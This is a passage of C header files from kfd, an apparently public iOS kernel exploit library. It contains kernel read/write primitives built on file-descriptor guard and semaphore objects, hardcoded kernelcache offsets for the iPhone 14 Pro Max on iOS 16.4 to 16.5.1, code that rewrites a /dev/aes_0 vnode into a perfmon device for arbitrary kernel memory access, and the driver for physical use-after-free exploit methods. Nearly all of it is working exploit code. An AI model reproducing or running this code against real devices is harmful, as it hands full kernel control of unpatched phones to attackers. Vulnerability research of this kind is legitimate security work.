        // Point fp_guard so that (new_fp_guard + offsetof(fileproc_guard, fpg_guard)) == kaddr.
        u64 old_fp_guard = static_uget(fileproc, fp_guard, fileproc_uaddr);
        u64 new_fp_guard = kaddr - static_offsetof(fileproc_guard, fpg_guard);
        static_uset(fileproc, fp_guard, fileproc_uaddr, new_fp_guard);

        u64 guard = old_value;
        u32 guardflags = GUARD_REQUIRED;
        u64 nguard = new_value;
        u32 nguardflags = GUARD_REQUIRED;

        if (allow_retry) {
            syscall(SYS_change_fdguard_np, kwrite_fd, &guard, guardflags, &nguard, nguardflags, NULL);
        } else {
            assert_bsd(syscall(SYS_change_fdguard_np, kwrite_fd, &guard, guardflags, &nguard, nguardflags, NULL));
        }

        // Always restore the fileproc to its pristine state.
        static_uset(fileproc, fp_guard_attrs, fileproc_uaddr, old_fp_guard_attrs);
        static_uset(fileproc, fp_guard, fileproc_uaddr, old_fp_guard);
    } while (allow_retry);
}

#endif /* kwrite_dup_h */
--------------------------------------------------------------------------------
/kfd/libkfd/krkw/kwrite/kwrite_sem_open.h:
--------------------------------------------------------------------------------
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef kwrite_sem_open_h
#define kwrite_sem_open_h

// Share the kread_sem_open method's fd table instead of spraying new objects.
void kwrite_sem_open_init(struct kfd* kfd)
{
    kfd->kwrite.krkw_maximum_id = kfd->kread.krkw_maximum_id;
    kfd->kwrite.krkw_object_size = sizeof(struct fileproc);

    kfd->kwrite.krkw_method_data_size = kfd->kread.krkw_method_data_size;
    kfd->kwrite.krkw_method_data = kfd->kread.krkw_method_data;
}

// Continue allocating from where the kread method stopped; skip entirely if
// kread already exhausted the shared id space.
void kwrite_sem_open_allocate(struct kfd* kfd, u64 id)
{
    if (id == 0) {
        id = kfd->kwrite.krkw_allocated_id = kfd->kread.krkw_allocated_id;
        if (kfd->kwrite.krkw_allocated_id == kfd->kwrite.krkw_maximum_id) {
            /*
             * Decrement krkw_allocated_id to account for increment in
             * krkw_helper_run_allocate(), because we return without allocating.
             */
            kfd->kwrite.krkw_allocated_id--;
            return;
        }
    }

    /*
     * Just piggyback.
     */
    kread_sem_open_allocate(kfd, id);
}

bool kwrite_sem_open_search(struct kfd* kfd, u64 object_uaddr)
{
    /*
     * Just piggyback.
41 | */ 42 | return kwrite_dup_search(kfd, object_uaddr); 43 | } 44 | 45 | void kwrite_sem_open_kwrite(struct kfd* kfd, void* uaddr, u64 kaddr, u64 size) 46 | { 47 | /* 48 | * Just piggyback. 49 | */ 50 | kwrite_dup_kwrite(kfd, uaddr, kaddr, size); 51 | } 52 | 53 | void kwrite_sem_open_find_proc(struct kfd* kfd) 54 | { 55 | /* 56 | * Assume that kread is responsible for that. 57 | */ 58 | return; 59 | } 60 | 61 | void kwrite_sem_open_deallocate(struct kfd* kfd, u64 id) 62 | { 63 | /* 64 | * Skip the deallocation for the kread object because we are 65 | * responsible for deallocating all the shared file descriptors. 66 | */ 67 | if (id != kfd->kread.krkw_object_id) { 68 | i32* fds = (i32*)(kfd->kwrite.krkw_method_data); 69 | assert_bsd(close(fds[id])); 70 | } 71 | } 72 | 73 | void kwrite_sem_open_free(struct kfd* kfd) 74 | { 75 | /* 76 | * Note that we are responsible to deallocate the kread object, but we must 77 | * discard its object id because of the check in kwrite_sem_open_deallocate(). 78 | */ 79 | u64 kread_id = kfd->kread.krkw_object_id; 80 | kfd->kread.krkw_object_id = (-1); 81 | kwrite_sem_open_deallocate(kfd, kread_id); 82 | kwrite_sem_open_deallocate(kfd, kfd->kwrite.krkw_object_id); 83 | kwrite_sem_open_deallocate(kfd, kfd->kwrite.krkw_maximum_id); 84 | } 85 | 86 | #endif /* kwrite_sem_open_h */ 87 | -------------------------------------------------------------------------------- /kfd/libkfd/perf.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef perf_h 6 | #define perf_h 7 | 8 | // Forward declarations for helper functions. 9 | u64 phystokv(struct kfd* kfd, u64 pa); 10 | u64 vtophys(struct kfd* kfd, u64 va); 11 | 12 | struct kernelcache_addresses { 13 | u64 kernel_base; 14 | u64 vn_kqfilter; // "Invalid knote filter on a vnode!" 
    u64 ptov_table; // "%s: illegal PA: 0x%llx; phys base 0x%llx, size 0x%llx"
    u64 gVirtBase; // "%s: illegal PA: 0x%llx; phys base 0x%llx, size 0x%llx"
    u64 gPhysBase; // "%s: illegal PA: 0x%llx; phys base 0x%llx, size 0x%llx"
    u64 gPhysSize; // (gPhysBase + 0x8)
    u64 perfmon_devices; // "perfmon: %s: devfs_make_node_clone failed"
    u64 perfmon_dev_open; // "perfmon: attempt to open unsupported source: 0x%x"
    u64 cdevsw; // "Can't mark ptc as kqueue ok"
    u64 vm_pages; // "pmap_startup(): too many pages to support vm_page packing"
    u64 vm_page_array_beginning_addr; // "pmap_startup(): too many pages to support vm_page packing"
    u64 vm_page_array_ending_addr; // "pmap_startup(): too many pages to support vm_page packing"
    u64 vm_first_phys_ppnum; // "pmap_startup(): too many pages to support vm_page packing"
};

// Hardcoded offset tables, indexed by kfd->perf.kernelcache_index.
const struct kernelcache_addresses kcs[] = {
    // An index of zero means that the version is unsupported.
    {},
    // From the iOS 16.4 kernelcache for the iPhone 14 Pro Max.
    {
        .kernel_base = 0xfffffff007004000,
        .vn_kqfilter = 0xfffffff007f3960c,
        .ptov_table = 0xfffffff0078e7178,
        .gVirtBase = 0xfffffff0079320a8,
        .gPhysBase = 0xfffffff007933ed0,
        .gPhysSize = 0xfffffff007933ed8,
        .perfmon_devices = 0xfffffff00a44f500,
        .perfmon_dev_open = 0xfffffff007eecd3c,
        .cdevsw = 0xfffffff00a411208,
        .vm_pages = 0xfffffff0078e3eb8,
        .vm_page_array_beginning_addr = 0xfffffff0078e6128,
        .vm_page_array_ending_addr = 0xfffffff00a44e988,
        .vm_first_phys_ppnum = 0xfffffff00a44e990,
    },
    // From the iOS 16.5 kernelcache for the iPhone 14 Pro Max.
    {
        .kernel_base = 0xfffffff007004000,
        .vn_kqfilter = 0xfffffff007f39b28,
        .ptov_table = 0xfffffff0078e7178,
        .gVirtBase = 0xfffffff0079321e8,
        .gPhysBase = 0xfffffff007934010,
        .gPhysSize = 0xfffffff007934018,
        .perfmon_devices = 0xfffffff00a457500,
        .perfmon_dev_open = 0xfffffff007eecfc0,
        .cdevsw = 0xfffffff00a419208,
        .vm_pages = 0xfffffff0078e3eb8,
        .vm_page_array_beginning_addr = 0xfffffff0078e6128,
        .vm_page_array_ending_addr = 0xfffffff00a456988,
        .vm_first_phys_ppnum = 0xfffffff00a456990,
    },
    // From the iOS 16.5.1 kernelcache for the iPhone 14 Pro Max.
    {
        .kernel_base = 0xfffffff007004000,
        .vn_kqfilter = 0xfffffff007f39c18,
        .ptov_table = 0xfffffff0078e7178,
        .gVirtBase = 0xfffffff007932288,
        .gPhysBase = 0xfffffff0079340b0,
        .gPhysSize = 0xfffffff0079340b8,
        .perfmon_devices = 0xfffffff00a457500,
        .perfmon_dev_open = 0xfffffff007eed0b0,
        .cdevsw = 0xfffffff00a419208,
        .vm_pages = 0xfffffff0078e3eb8,
        .vm_page_array_beginning_addr = 0xfffffff0078e6128,
        .vm_page_array_ending_addr = 0xfffffff00a456988,
        .vm_first_phys_ppnum = 0xfffffff00a456990,
    }
};

// "Master" kread: program the shared perfmon_config so the kernel treats the
// target range [kaddr, kaddr+size) as the configured ps_events array, then
// issue PERFMON_CTL_SPECIFY, which copies it out into our user buffer.
// size is a byte count here and must fit in the u16 ps_event_count field.
void perf_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size)
{
    assert((size != 0) && (size <= UINT16_MAX));
    assert(kfd->perf.shared_page.uaddr);
    assert(kfd->perf.shared_page.kaddr);

    // The shared page is mapped in both address spaces: write the config
    // through the user mapping; the kernel reads it at shared_page.kaddr.
    volatile struct perfmon_config* config = (volatile struct perfmon_config*)(kfd->perf.shared_page.uaddr);
    *config = (volatile struct perfmon_config){};
    config->pc_spec.ps_events = (struct perfmon_event*)(kaddr);
    config->pc_spec.ps_event_count = (u16)(size);

    struct perfmon_spec spec_buffer = {};
    spec_buffer.ps_events = (struct perfmon_event*)(uaddr);
    spec_buffer.ps_event_count = (u16)(size);
    assert_bsd(ioctl(kfd->perf.dev.fd, PERFMON_CTL_SPECIFY, &spec_buffer));

    // Scrub the config so nothing stale is left behind in the shared page.
    *config = (volatile struct perfmon_config){};
98 | } 99 | 100 | void perf_kwrite(struct kfd* kfd, void* uaddr, u64 kaddr, u64 size) 101 | { 102 | assert((size != 0) && ((size % sizeof(u64)) == 0)); 103 | assert(kfd->perf.shared_page.uaddr); 104 | assert(kfd->perf.shared_page.kaddr); 105 | 106 | volatile struct perfmon_config* config = (volatile struct perfmon_config*)(kfd->perf.shared_page.uaddr); 107 | volatile struct perfmon_source* source = (volatile struct perfmon_source*)(kfd->perf.shared_page.uaddr + sizeof(*config)); 108 | volatile struct perfmon_event* event = (volatile struct perfmon_event*)(kfd->perf.shared_page.uaddr + sizeof(*config) + sizeof(*source)); 109 | 110 | u64 source_kaddr = kfd->perf.shared_page.kaddr + sizeof(*config); 111 | u64 event_kaddr = kfd->perf.shared_page.kaddr + sizeof(*config) + sizeof(*source); 112 | 113 | for (u64 i = 0; i < (size / sizeof(u64)); i++) { 114 | *config = (volatile struct perfmon_config){}; 115 | *source = (volatile struct perfmon_source){}; 116 | *event = (volatile struct perfmon_event){}; 117 | 118 | config->pc_source = (struct perfmon_source*)(source_kaddr); 119 | config->pc_spec.ps_events = (struct perfmon_event*)(event_kaddr); 120 | config->pc_counters = (struct perfmon_counter*)(kaddr + (i * sizeof(u64))); 121 | 122 | source->ps_layout.pl_counter_count = 1; 123 | source->ps_layout.pl_fixed_offset = 1; 124 | 125 | struct perfmon_event event_buffer = {}; 126 | u64 kvalue = ((volatile u64*)(uaddr))[i]; 127 | event_buffer.pe_number = kvalue; 128 | assert_bsd(ioctl(kfd->perf.dev.fd, PERFMON_CTL_ADD_EVENT, &event_buffer)); 129 | } 130 | 131 | *config = (volatile struct perfmon_config){}; 132 | *source = (volatile struct perfmon_source){}; 133 | *event = (volatile struct perfmon_event){}; 134 | } 135 | 136 | void perf_init(struct kfd* kfd) 137 | { 138 | char hw_model[16] = {}; 139 | usize size = sizeof(hw_model); 140 | assert_bsd(sysctlbyname("hw.model", hw_model, &size, NULL, 0)); 141 | print_string(hw_model); 142 | 143 | const char iphone_14_pro_max[] = 
"D74AP"; 144 | if (memcmp(hw_model, iphone_14_pro_max, sizeof(iphone_14_pro_max))) { 145 | kfd->perf.kernelcache_index = 0; 146 | return; 147 | } 148 | 149 | switch (*(u64*)(&kfd->info.env.osversion)) { 150 | case ios_16_4: { 151 | kfd->perf.kernelcache_index = 1; 152 | break; 153 | } 154 | case ios_16_5: { 155 | kfd->perf.kernelcache_index = 2; 156 | break; 157 | } 158 | case ios_16_5_1: { 159 | kfd->perf.kernelcache_index = 3; 160 | break; 161 | } 162 | default: { 163 | kfd->perf.kernelcache_index = 0; 164 | return; 165 | } 166 | } 167 | 168 | /* 169 | * Allocate a page that will be used as a shared buffer between user space and kernel space. 170 | */ 171 | vm_address_t shared_page_address = 0; 172 | vm_size_t shared_page_size = pages(1); 173 | assert_mach(vm_allocate(mach_task_self(), &shared_page_address, shared_page_size, VM_FLAGS_ANYWHERE)); 174 | memset((void*)(shared_page_address), 0, shared_page_size); 175 | kfd->perf.shared_page.uaddr = shared_page_address; 176 | kfd->perf.shared_page.size = shared_page_size; 177 | } 178 | 179 | void perf_run(struct kfd* kfd) 180 | { 181 | if (!kfd->perf.kernelcache_index) { 182 | return; 183 | } 184 | 185 | const struct kernelcache_addresses* kc = &kcs[kfd->perf.kernelcache_index]; 186 | 187 | /* 188 | * Open a "/dev/aes_0" descriptor, then use it to find the kernel slide. 
189 | */ 190 | kfd->perf.dev.fd = open("/dev/aes_0", O_RDWR); 191 | assert(kfd->perf.dev.fd > 0); 192 | 193 | assert(kfd->info.kaddr.current_proc); 194 | u64 fd_ofiles_kaddr = kfd->info.kaddr.current_proc + dynamic_offsetof(proc, p_fd_fd_ofiles); 195 | u64 fd_ofiles = 0; 196 | kread((u64)(kfd), fd_ofiles_kaddr, &fd_ofiles, sizeof(fd_ofiles)); 197 | 198 | u64 fileproc_kaddr = unsign_kaddr(fd_ofiles) + (kfd->perf.dev.fd * sizeof(u64)); 199 | u64 fileproc = 0; 200 | kread((u64)(kfd), fileproc_kaddr, &fileproc, sizeof(fileproc)); 201 | 202 | u64 fp_glob_kaddr = fileproc + static_offsetof(fileproc, fp_glob); 203 | u64 fp_glob = 0; 204 | kread((u64)(kfd), fp_glob_kaddr, &fp_glob, sizeof(fp_glob)); 205 | 206 | u64 fg_ops_kaddr = unsign_kaddr(fp_glob) + static_offsetof(fileglob, fg_ops); 207 | u64 fg_ops = 0; 208 | kread((u64)(kfd), fg_ops_kaddr, &fg_ops, sizeof(fg_ops)); 209 | 210 | u64 fo_kqfilter_kaddr = unsign_kaddr(fg_ops) + static_offsetof(fileops, fo_kqfilter); 211 | u64 fo_kqfilter = 0; 212 | kread((u64)(kfd), fo_kqfilter_kaddr, &fo_kqfilter, sizeof(fo_kqfilter)); 213 | 214 | u64 vn_kqfilter = unsign_kaddr(fo_kqfilter); 215 | u64 kernel_slide = vn_kqfilter - kc->vn_kqfilter; 216 | u64 kernel_base = kc->kernel_base + kernel_slide; 217 | kfd->perf.kernel_slide = kernel_slide; 218 | print_x64(kfd->perf.kernel_slide); 219 | 220 | u32 mh_header[2] = {}; 221 | mh_header[0] = kread_sem_open_kread_u32(kfd, kernel_base); 222 | mh_header[1] = kread_sem_open_kread_u32(kfd, kernel_base + 4); 223 | assert(mh_header[0] == 0xfeedfacf); 224 | assert(mh_header[1] == 0x0100000c); 225 | 226 | /* 227 | * Set up some globals used by vm_page.h. 
228 | */ 229 | u64 vm_pages_kaddr = kc->vm_pages + kernel_slide; 230 | u64 vm_page_array_beginning_addr_kaddr = kc->vm_page_array_beginning_addr + kernel_slide; 231 | u64 vm_page_array_ending_addr_kaddr = kc->vm_page_array_ending_addr + kernel_slide; 232 | u64 vm_first_phys_ppnum_kaddr = kc->vm_first_phys_ppnum + kernel_slide; 233 | kread((u64)(kfd), vm_pages_kaddr, &vm_pages, sizeof(vm_pages)); 234 | kread((u64)(kfd), vm_page_array_beginning_addr_kaddr, &vm_page_array_beginning_addr, sizeof(vm_page_array_beginning_addr)); 235 | kread((u64)(kfd), vm_page_array_ending_addr_kaddr, &vm_page_array_ending_addr, sizeof(vm_page_array_ending_addr)); 236 | vm_first_phys_ppnum = kread_sem_open_kread_u32(kfd, vm_first_phys_ppnum_kaddr); 237 | 238 | /* 239 | * Corrupt the "/dev/aes_0" descriptor into a "/dev/perfmon_core" descriptor. 240 | */ 241 | u64 fg_data_kaddr = unsign_kaddr(fp_glob) + static_offsetof(fileglob, fg_data); 242 | u64 fg_data = 0; 243 | kread((u64)(kfd), fg_data_kaddr, &fg_data, sizeof(fg_data)); 244 | 245 | u64 v_specinfo_kaddr = unsign_kaddr(fg_data) + 0x0078; // offsetof(struct vnode, v_specinfo) 246 | u64 v_specinfo = 0; 247 | kread((u64)(kfd), v_specinfo_kaddr, &v_specinfo, sizeof(v_specinfo)); 248 | 249 | kfd->perf.dev.si_rdev_kaddr = unsign_kaddr(v_specinfo) + 0x0018; // offsetof(struct specinfo, si_rdev) 250 | kread((u64)(kfd), kfd->perf.dev.si_rdev_kaddr, &kfd->perf.dev.si_rdev_buffer, sizeof(kfd->perf.dev.si_rdev_buffer)); 251 | 252 | u64 cdevsw_kaddr = kc->cdevsw + kernel_slide; 253 | u64 perfmon_dev_open_kaddr = kc->perfmon_dev_open + kernel_slide; 254 | u64 cdevsw[14] = {}; 255 | u32 dev_new_major = 0; 256 | for (u64 dmaj = 0; dmaj < 64; dmaj++) { 257 | u64 kaddr = cdevsw_kaddr + (dmaj * sizeof(cdevsw)); 258 | kread((u64)(kfd), kaddr, &cdevsw, sizeof(cdevsw)); 259 | u64 d_open = unsign_kaddr(cdevsw[0]); 260 | if (d_open == perfmon_dev_open_kaddr) { 261 | dev_new_major = (dmaj << 24); 262 | break; 263 | } 264 | } 265 | 266 | assert(dev_new_major 
== 0x11000000);

    // Swap the aes_0 vnode's dev_t to the perfmon major (minor + 1 selects
    // the CPMU perfmon instance).
    u32 new_si_rdev_buffer[2] = {};
    new_si_rdev_buffer[0] = dev_new_major;
    new_si_rdev_buffer[1] = kfd->perf.dev.si_rdev_buffer[1] + 1;
    kwrite((u64)(kfd), &new_si_rdev_buffer, kfd->perf.dev.si_rdev_kaddr, sizeof(new_si_rdev_buffer));

    /*
     * Find ptov_table, gVirtBase, gPhysBase, gPhysSize, TTBR0 and TTBR1.
     */
    u64 ptov_table_kaddr = kc->ptov_table + kernel_slide;
    kread((u64)(kfd), ptov_table_kaddr, &kfd->perf.ptov_table, sizeof(kfd->perf.ptov_table));

    u64 gVirtBase_kaddr = kc->gVirtBase + kernel_slide;
    kread((u64)(kfd), gVirtBase_kaddr, &kfd->perf.gVirtBase, sizeof(kfd->perf.gVirtBase));
    print_x64(kfd->perf.gVirtBase);

    u64 gPhysBase_kaddr = kc->gPhysBase + kernel_slide;
    kread((u64)(kfd), gPhysBase_kaddr, &kfd->perf.gPhysBase, sizeof(kfd->perf.gPhysBase));
    print_x64(kfd->perf.gPhysBase);

    u64 gPhysSize_kaddr = kc->gPhysSize + kernel_slide;
    kread((u64)(kfd), gPhysSize_kaddr, &kfd->perf.gPhysSize, sizeof(kfd->perf.gPhysSize));
    print_x64(kfd->perf.gPhysSize);

    // TTBR0 (user) root table from our pmap; sanity-check VA/PA consistency.
    assert(kfd->info.kaddr.current_pmap);
    u64 ttbr0_va_kaddr = kfd->info.kaddr.current_pmap + static_offsetof(pmap, tte);
    u64 ttbr0_pa_kaddr = kfd->info.kaddr.current_pmap + static_offsetof(pmap, ttep);
    kread((u64)(kfd), ttbr0_va_kaddr, &kfd->perf.ttbr[0].va, sizeof(kfd->perf.ttbr[0].va));
    kread((u64)(kfd), ttbr0_pa_kaddr, &kfd->perf.ttbr[0].pa, sizeof(kfd->perf.ttbr[0].pa));
    assert(phystokv(kfd, kfd->perf.ttbr[0].pa) == kfd->perf.ttbr[0].va);

    // TTBR1 (kernel) root table from the kernel pmap.
    assert(kfd->info.kaddr.kernel_pmap);
    u64 ttbr1_va_kaddr = kfd->info.kaddr.kernel_pmap + static_offsetof(pmap, tte);
    u64 ttbr1_pa_kaddr = kfd->info.kaddr.kernel_pmap + static_offsetof(pmap, ttep);
    kread((u64)(kfd), ttbr1_va_kaddr, &kfd->perf.ttbr[1].va, sizeof(kfd->perf.ttbr[1].va));
    kread((u64)(kfd), ttbr1_pa_kaddr, &kfd->perf.ttbr[1].pa, sizeof(kfd->perf.ttbr[1].pa));
    assert(phystokv(kfd, kfd->perf.ttbr[1].pa) == kfd->perf.ttbr[1].va);

    /*
     * Find the shared page in kernel space.
     */
    kfd->perf.shared_page.paddr = vtophys(kfd, kfd->perf.shared_page.uaddr);
    kfd->perf.shared_page.kaddr = phystokv(kfd, kfd->perf.shared_page.paddr);

    /*
     * Set up the perfmon device use for the master kread and kwrite:
     * - perfmon_devices[0][0].pmdv_config = kfd->perf.shared_page.kaddr
     * - perfmon_devices[0][0].pmdv_allocated = true
     */
    struct perfmon_device perfmon_device = {};
    u64 perfmon_device_kaddr = kc->perfmon_devices + kernel_slide;
    u8* perfmon_device_uaddr = (u8*)(&perfmon_device);
    kread((u64)(kfd), perfmon_device_kaddr, &perfmon_device, sizeof(perfmon_device));
    // Sanity-check the lck_mtx signature before touching the device.
    assert((perfmon_device.pmdv_mutex[0] & 0xffffff00ffffffff) == 0x0000000022000000);

    perfmon_device.pmdv_mutex[1] = (-1);
    perfmon_device.pmdv_config = (struct perfmon_config*)(kfd->perf.shared_page.kaddr);
    perfmon_device.pmdv_allocated = true;

    // Write the modified fields back 8 bytes at a time, zeroing the mutex
    // owner words in the local copy between writes so each chunk is exact.
    kwrite((u64)(kfd), perfmon_device_uaddr + 12, perfmon_device_kaddr + 12, sizeof(u64));
    ((volatile u32*)(perfmon_device_uaddr))[4] = 0;
    kwrite((u64)(kfd), perfmon_device_uaddr + 16, perfmon_device_kaddr + 16, sizeof(u64));
    ((volatile u32*)(perfmon_device_uaddr))[5] = 0;
    kwrite((u64)(kfd), perfmon_device_uaddr + 20, perfmon_device_kaddr + 20, sizeof(u64));
    kwrite((u64)(kfd), perfmon_device_uaddr + 24, perfmon_device_kaddr + 24, sizeof(u64));
    kwrite((u64)(kfd), perfmon_device_uaddr + 28, perfmon_device_kaddr + 28, sizeof(u64));

    // Swap in the fast primitives, keeping the originals for perf_free().
    kfd->perf.saved_kread = kfd->kread.krkw_method_ops.kread;
    kfd->perf.saved_kwrite = kfd->kwrite.krkw_method_ops.kwrite;
    kfd->kread.krkw_method_ops.kread = perf_kread;
    kfd->kwrite.krkw_method_ops.kwrite = perf_kwrite;
}

// Undo perf_run(): restore the original krkw ops and the aes_0 dev_t,
// close the device fd, and release the shared page.
void perf_free(struct kfd* kfd)
{
    if
(!kfd->perf.kernelcache_index) {
        return;
    }

    kfd->kread.krkw_method_ops.kread = kfd->perf.saved_kread;
    kfd->kwrite.krkw_method_ops.kwrite = kfd->perf.saved_kwrite;

    /*
     * Restore the "/dev/perfmon_core" descriptor back to the "/dev/aes_0" descriptor.
     * Then, close it and deallocate the shared page.
     * This leaves the first perfmon device "pmdv_allocated", which is fine.
     */
    kwrite((u64)(kfd), &kfd->perf.dev.si_rdev_buffer, kfd->perf.dev.si_rdev_kaddr, sizeof(kfd->perf.dev.si_rdev_buffer));

    assert_bsd(close(kfd->perf.dev.fd));
    assert_mach(vm_deallocate(mach_task_self(), kfd->perf.shared_page.uaddr, kfd->perf.shared_page.size));
}

/*
 * Helper perf functions.
 */

// Translate a physical address to its kernel virtual address: first via the
// ptov_table ranges, falling back to the gVirtBase/gPhysBase linear mapping.
// Asserts if pa is outside [gPhysBase, gPhysBase + gPhysSize) on the fallback path.
u64 phystokv(struct kfd* kfd, u64 pa)
{
    const u64 PTOV_TABLE_SIZE = 8;
    const u64 gVirtBase = kfd->perf.gVirtBase;
    const u64 gPhysBase = kfd->perf.gPhysBase;
    const u64 gPhysSize = kfd->perf.gPhysSize;
    const struct ptov_table_entry* ptov_table = &kfd->perf.ptov_table[0];

    for (u64 i = 0; (i < PTOV_TABLE_SIZE) && (ptov_table[i].len != 0); i++) {
        if ((pa >= ptov_table[i].pa) && (pa < (ptov_table[i].pa + ptov_table[i].len))) {
            return pa - ptov_table[i].pa + ptov_table[i].va;
        }
    }

    assert(!((pa < gPhysBase) || ((pa - gPhysBase) >= gPhysSize)));
    return pa - gPhysBase + gVirtBase;
}

// Translate a virtual address to its physical address by software-walking
// the (16K-granule) translation tables from L1 to L3, using kread for each
// table entry. The top bit of va selects TTBR1 (kernel) vs TTBR0 (user).
// Returns 0 if any level's entry is invalid.
u64 vtophys(struct kfd* kfd, u64 va)
{
    const u64 ROOT_LEVEL = PMAP_TT_L1_LEVEL;
    const u64 LEAF_LEVEL = PMAP_TT_L3_LEVEL;

    u64 pa = 0;
    u64 tt_kaddr = (va >> 63) ? kfd->perf.ttbr[1].va : kfd->perf.ttbr[0].va;

    for (u64 cur_level = ROOT_LEVEL; cur_level <= LEAF_LEVEL; cur_level++) {
        // Per-level masks/shifts for the 16K translation granule.
        u64 offmask, shift, index_mask, valid_mask, type_mask, type_block;
        switch (cur_level) {
        case PMAP_TT_L0_LEVEL: {
            offmask = ARM_16K_TT_L0_OFFMASK;
            shift = ARM_16K_TT_L0_SHIFT;
            index_mask = ARM_16K_TT_L0_INDEX_MASK;
            valid_mask = ARM_TTE_VALID;
            type_mask = ARM_TTE_TYPE_MASK;
            type_block = ARM_TTE_TYPE_BLOCK;
            break;
        }
        case PMAP_TT_L1_LEVEL: {
            offmask = ARM_16K_TT_L1_OFFMASK;
            shift = ARM_16K_TT_L1_SHIFT;
            index_mask = ARM_16K_TT_L1_INDEX_MASK;
            valid_mask = ARM_TTE_VALID;
            type_mask = ARM_TTE_TYPE_MASK;
            type_block = ARM_TTE_TYPE_BLOCK;
            break;
        }
        case PMAP_TT_L2_LEVEL: {
            offmask = ARM_16K_TT_L2_OFFMASK;
            shift = ARM_16K_TT_L2_SHIFT;
            index_mask = ARM_16K_TT_L2_INDEX_MASK;
            valid_mask = ARM_TTE_VALID;
            type_mask = ARM_TTE_TYPE_MASK;
            type_block = ARM_TTE_TYPE_BLOCK;
            break;
        }
        case PMAP_TT_L3_LEVEL: {
            offmask = ARM_16K_TT_L3_OFFMASK;
            shift = ARM_16K_TT_L3_SHIFT;
            index_mask = ARM_16K_TT_L3_INDEX_MASK;
            valid_mask = ARM_PTE_TYPE_VALID;
            type_mask = ARM_PTE_TYPE_MASK;
            type_block = ARM_TTE_TYPE_L3BLOCK;
            break;
        }
        default: {
            assert_false("bad pmap tt level");
            return 0;
        }
        }

        u64 tte_index = (va & index_mask) >> shift;
        u64 tte_kaddr = tt_kaddr + (tte_index * sizeof(u64));
        u64 tte = 0;
        kread((u64)(kfd), tte_kaddr, &tte, sizeof(tte));

        if ((tte & valid_mask) != valid_mask) {
            return 0;
        }

        // A block/page mapping terminates the walk: combine the output
        // address bits with the in-block offset from va.
        if ((tte & type_mask) == type_block) {
            pa = ((tte & ARM_TTE_PA_MASK & ~offmask) | (va & offmask));
            break;
        }

        // Otherwise descend into the next-level table.
        tt_kaddr = phystokv(kfd, tte & ARM_TTE_TABLE_MASK);
    }

    return pa;
}

#endif /* perf_h */
--------------------------------------------------------------------------------
/kfd/libkfd/puaf.h:
--------------------------------------------------------------------------------
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef puaf_h
#define puaf_h

// Forward declarations for helper functions.
void puaf_helper_get_vm_map_first_and_last(u64* first_out, u64* last_out);
void puaf_helper_get_vm_map_min_and_max(u64* min_out, u64* max_out);
void puaf_helper_give_ppl_pages(void);

#include "puaf/physpuppet.h"
#include "puaf/smith.h"

// Bind the ops table to the <method>_init/run/cleanup/free functions for the
// selected PUAF method.
#define puaf_method_case(method) \
    case puaf_##method: { \
        const char* method_name = #method; \
        print_string(method_name); \
        kfd->puaf.puaf_method_ops.init = method##_init; \
        kfd->puaf.puaf_method_ops.run = method##_run; \
        kfd->puaf.puaf_method_ops.cleanup = method##_cleanup; \
        kfd->puaf.puaf_method_ops.free = method##_free; \
        break; \
    }

// Record the requested number of PUAF pages, select the method's ops, and
// run the method's own init hook.
void puaf_init(struct kfd* kfd, u64 puaf_pages, u64 puaf_method)
{
    kfd->puaf.number_of_puaf_pages = puaf_pages;
    kfd->puaf.puaf_pages_uaddr = (u64*)(malloc_bzero(kfd->puaf.number_of_puaf_pages * sizeof(u64)));

    switch (puaf_method) {
        puaf_method_case(physpuppet)
        puaf_method_case(smith)
    }

    kfd->puaf.puaf_method_ops.init(kfd);
}

// Execute the PUAF exploit itself (timed), after nudging pages out of PPL.
void puaf_run(struct kfd* kfd)
{
    puaf_helper_give_ppl_pages();

    timer_start();
    kfd->puaf.puaf_method_ops.run(kfd);
    timer_end();
}

// Method-specific post-krkw cleanup (timed).
void puaf_cleanup(struct kfd* kfd)
{
    timer_start();
    kfd->puaf.puaf_method_ops.cleanup(kfd);
    timer_end();
}

// Final teardown: method free hook, then release the bookkeeping buffers.
void puaf_free(struct kfd* kfd)
{
    kfd->puaf.puaf_method_ops.free(kfd);

    bzero_free(kfd->puaf.puaf_pages_uaddr, kfd->puaf.number_of_puaf_pages * sizeof(u64));

    if (kfd->puaf.puaf_method_data) {
        bzero_free(kfd->puaf.puaf_method_data, kfd->puaf.puaf_method_data_size);
    }
}

/*
 * Helper puaf functions.
 */

// Scan our vm_map with vm_region_64() to find the first mapped address and
// the address just past the last mapping (where KERN_INVALID_ADDRESS hits).
void puaf_helper_get_vm_map_first_and_last(u64* first_out, u64* last_out)
{
    u64 first_address = 0;
    u64 last_address = 0;

    vm_address_t address = 0;
    vm_size_t size = 0;
    vm_region_basic_info_data_64_t data = {};
    vm_region_info_t info = (vm_region_info_t)(&data);
    mach_msg_type_number_t count = VM_REGION_BASIC_INFO_COUNT_64;
    mach_port_t port = MACH_PORT_NULL;

    while (true) {
        kern_return_t kret = vm_region_64(mach_task_self(), &address, &size, VM_REGION_BASIC_INFO_64, info, &count, &port);
        if (kret == KERN_INVALID_ADDRESS) {
            last_address = address;
            break;
        }

        assert(kret == KERN_SUCCESS);

        if (!first_address) {
            first_address = address;
        }

        address += size;
        size = 0;
    }

    *first_out = first_address;
    *last_out = last_address;
}

// Fetch the vm_map's min/max address bounds via task_info(TASK_VM_INFO).
void puaf_helper_get_vm_map_min_and_max(u64* min_out, u64* max_out)
{
    task_vm_info_data_t data = {};
    task_info_t info = (task_info_t)(&data);
    mach_msg_type_number_t count = TASK_VM_INFO_COUNT;
    assert_mach(task_info(mach_task_self(), TASK_VM_INFO, info, &count));

    *min_out = data.min_address;
    *max_out = data.max_address;
}

// Touch one page in each 32 MiB (L2 block) stride of the address space, then
// free them all, encouraging pages to be handed back from PPL to the kernel
// free list before the PUAF method runs.
void puaf_helper_give_ppl_pages(void)
{
    timer_start();

    const u64 given_ppl_pages_max = 10000;
    const u64 l2_block_size = (1ull << 25);

    vm_address_t addresses[given_ppl_pages_max] = {};
    vm_address_t address = 0;
    u64 given_ppl_pages = 0;

    u64 min_address, max_address;
    puaf_helper_get_vm_map_min_and_max(&min_address, &max_address);

    while (true) {
        address += l2_block_size;
        if (address < min_address) {
            continue;
        }

